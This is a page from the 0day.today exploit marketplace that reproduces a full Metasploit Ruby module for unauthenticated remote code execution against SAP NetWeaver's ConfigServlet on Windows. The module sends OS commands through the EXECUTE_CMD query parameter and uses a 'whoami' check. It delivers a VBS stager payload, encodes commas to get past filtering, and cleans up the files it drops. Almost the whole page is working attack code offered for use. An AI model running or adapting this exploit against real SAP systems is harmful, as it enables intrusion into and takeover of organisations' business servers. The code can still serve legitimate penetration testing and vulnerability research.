[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

SAP ConfigServlet Remote Code Execution Vulnerability

Author
metasploit
Risk
[
Security Risk Critical
]
0day-ID
0day-ID-20709
Category
remote exploits
Date add
30-04-2013
Platform
windows
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit
  Rank = GreatRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStagerVBS
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'            => 'SAP ConfigServlet Remote Code Execution',
      'Description'     => %q{
        This module allows remote code execution via operating system commands through the
        SAP ConfigServlet without any authentication. This module has been tested successfully
        with SAP NetWeaver 7.00 and 7.01 on Windows Server 2008 R2.
      },
      'Author'          =>
        [
          'Dmitry Chastuhin', # Vulnerability discovery (based on the reference presentation)
          'Andras Kabai' # Metasploit module
        ],
      'License'         => MSF_LICENSE,
      'References'      =>
        [
          [ 'OSVDB', '92704'],
          [ 'EDB', '24996'],
          [ 'URL', 'http://erpscan.com/wp-content/uploads/2012/11/Breaking-SAP-Portal-HackerHalted-2012.pdf']
        ],
      'DisclosureDate' => 'Nov 01 2012', # Based on the reference presentation
      'Platform'       => 'win',
      'Targets'        =>
        [
          [
            'Windows generic',
            {
              'Arch' => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 0,
      'Privileged'     => false
      ))

    register_options(
      [
        Opt::RPORT(50000),
        OptString.new('TARGETURI', [ true, 'Path to ConfigServlet', '/ctc/servlet'])
      ], self.class)

    register_advanced_options(
      [
        OptBool.new('DELETE_FILES', [ true, 'Delete the dropped files after exploitation', true ])
      ], self.class)
  end

  def check
    uri = normalize_uri(target_uri.path, 'ConfigServlet')
    begin
      res = send_evil_request(uri, "whoami", 20)
    rescue
      Exploit::CheckCode::Unknown
    end
    if !res
      Exploit::CheckCode::Unknown
    elsif res.body.include?("Process created")
      Exploit::CheckCode::Vulnerable
    else
      Exploit::CheckCode::Safe
    end
  end

  def exploit
    print_status("#{rhost}:#{rport} - Exploiting remote system")
    uri = normalize_uri(target_uri.path, 'ConfigServlet')

    execute_cmdstager( { :linemax => 1500, :nodelete => !datastore['DELETE_FILES'], :sap_configservlet_uri => uri })
  end

  def execute_command(cmd, opts)
    commands = cmd.split(/&/)
    commands.each do |command|
      timeout = 20
      if datastore['DELETE_FILES'] and command =~ /shell\.run \"(.*)\"/
        register_file_for_cleanup($1)
      end
      if command.include?(".vbs") and command.include?(",")
        # because the comma is bad character and the VBS stager contains commas it is necessary to "create" commas without directly using them
        # using the following command line trick it is possible to echo commas into the right places
        command.gsub!(",", "%i")
        command = "cmd /c FOR /F \"usebackq tokens=2 delims=)\" %i IN (\`\"ping -n 1 127.0.0.1| findstr )\"\`) DO " + command
      else
        command = "cmd /c " + command
      end
      if command.include?("cscript")
        # in case of bigger payloads the VBS stager could run for longer time as it needs to decode lot of data
        # increaste timeout value when the VBS stager is called
        timeout = 120
      end
      vprint_status("Attempting to execute: #{command}")
      send_evil_request(opts[:sap_configservlet_uri], command, timeout)
    end
  end

  def send_evil_request(uri, cmd, timeout)
    begin
      res = send_request_cgi(
        {
          'uri' => uri,
          'method' => 'GET',
          'query' => 'param=com.sap.ctc.util.FileSystemConfig;EXECUTE_CMD;CMDLINE=' + Rex::Text.uri_encode(cmd)
        }, timeout)

      if !res
        fail_with(Exploit::Failure::Unknown, "#{rhost}:#{rport} - Exploit failed.")
      end

      if res.code != 200
        vprint_error("#{rhost}:#{rport} - Output: #{res.body}")
        fail_with(Exploit::Failure::UnexpectedReply, "#{rhost}:#{rport} - Exploit failed.")
      end
    rescue ::Rex::ConnectionError
      fail_with(Exploit::Failure::Unreachable, "#{rhost}:#{rport} - Failed to connect to the server.")
    end

    if not res.body.include?("Process created")
      vprint_error("#{rhost}:#{rport} - Output: #{res.body}")
      fail_with(Exploit::Failure::PayloadFailed, "#{rhost}:#{rport} - Exploit failed.")
    end
    return res
  end
end

#  0day.today [2024-11-15]  #